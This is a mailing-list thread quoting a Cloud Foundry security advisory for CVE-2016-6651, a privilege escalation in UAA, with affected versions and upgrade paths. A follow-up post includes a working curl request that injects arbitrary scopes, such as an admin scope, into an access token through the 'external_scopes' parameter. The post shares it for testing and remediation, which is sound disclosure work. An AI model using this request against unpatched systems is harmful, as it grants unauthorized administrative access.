Anyone know off hand if CC uses online or offline validation? If
configurable what config would we look for to know if it is online or
offline?

Thanks,
Mike

On Mon, Sep 26, 2016 at 12:58 PM, Molly Crowther <
mcrowther(a)cloudfoundry.org> wrote:

Hello all,

In the interest of full public disclosure, the CFF Security Team would
also like to share some additional information about this vulnerability
that will aid in testing and remediation. Please let us know if you have
any questions or concerns.

Thanks,
Molly Crowther
Cloud Foundry Foundation Security Team
Description of Vulnerability

The vulnerability exposes an untested parameter that lets any application
add arbitrary scopes (permissions) to an access token.

curl https://login.urlredacted.com/oauth/token
<https://login.run.pivotal.io/oauth/token> \

-H"Accept: Application/json" \

-u "cf:" \

-d "username=<username here>" \

-d "password=<password here>" \

-d "client_id=cf" \

-d "grant_type=password" \

-d "response_type=token" \

-d "external_scopes=cloud_controller.test"

A vulnerable system will return the following response:

{

"access_token": "redacted for readability",

"expires_in": 599,

"jti": "redacted for readability",

"refresh_token": "redacted for readability",

"scope": "openid … cloud_controller.test",

"token_type": "bearer"

}

cloud_controller.test is an arbitrary string, but may as well be
cloud_controller.admin.

Applications that perform off-line validation will happily accept the
inserted string as a permission. Applications that use online validations,
i.e. the use of the /check_token UAA API endpoint, are not vulnerable - the
UAA validates the permissions against what’s in the database (uaadb).

A patched system will ignore the external_scopes parameter completely,
and cloud_controller.test will not be returned in the response.

On Mon, Sep 26, 2016 at 11:23 AM, Molly Crowther <
mcrowther(a)cloudfoundry.org> wrote:

CVE-2016-6651: Privilege Escalation in UAA
Severity

High
Vendor

Cloud Foundry Foundation
Versions Affected

-

Cloud Foundry release v242 and earlier versions
-

UAA release v3.7.0 & earlier versions
-

UAA bosh release (uaa-release) v16 & earlier versions

Description

A privilege escalation vulnerability has been identified with the
/oauth/token endpoint in UAA allowing users to elevate the privileges in
the token issued.
Mitigation

OSS users are strongly encouraged to follow one of the mitigations below:

-

Upgrade to Cloud Foundry v243 [1] or later
-

For standalone UAA users
-

For users using UAA Version 3.0.0 - 3.7.0, please upgrade to UAA
Release to v3.7.3[2], v3.4.5[3] or v3.3.0.6[4]
-

For users using standalone UAA Version 2.X.X, please upgrade to
UAA Release to v2.7.4.8 [5]
-

For users using UAA bosh release, please upgrade to UAA-Release
v17 [6] if upgrading to v3.7.3 [2] ,v12.6 [7] if upgrading to v3.4.5[3] or
v11.7 [8] if upgrading to v3.3.0.6[4]

Credit

SAP HCP Security Team
References

-

[1] https://github.com/cloudfoundry/cf-release/releases/tag/v243
-

[2] https://github.com/cloudfoundry/uaa/releases/tag/3.7.3
-

[3] https://github.com/cloudfoundry/uaa/releases/tag/3.4.5
-

[4] https://github.com/cloudfoundry/uaa/releases/tag/3.3.0.6
-

[5] https://github.com/cloudfoundry/uaa/releases/tag/2.7.4.8
-

[6] https://github.com/cloudfoundry/uaa-release/releases/tag/v17
-

[7] https://github.com/cloudfoundry/uaa-release/releases/tag/v12.6
-

[8] https://github.com/cloudfoundry/uaa-release/releases/tag/v11.7

History2016-09-26: Initial vulnerability report published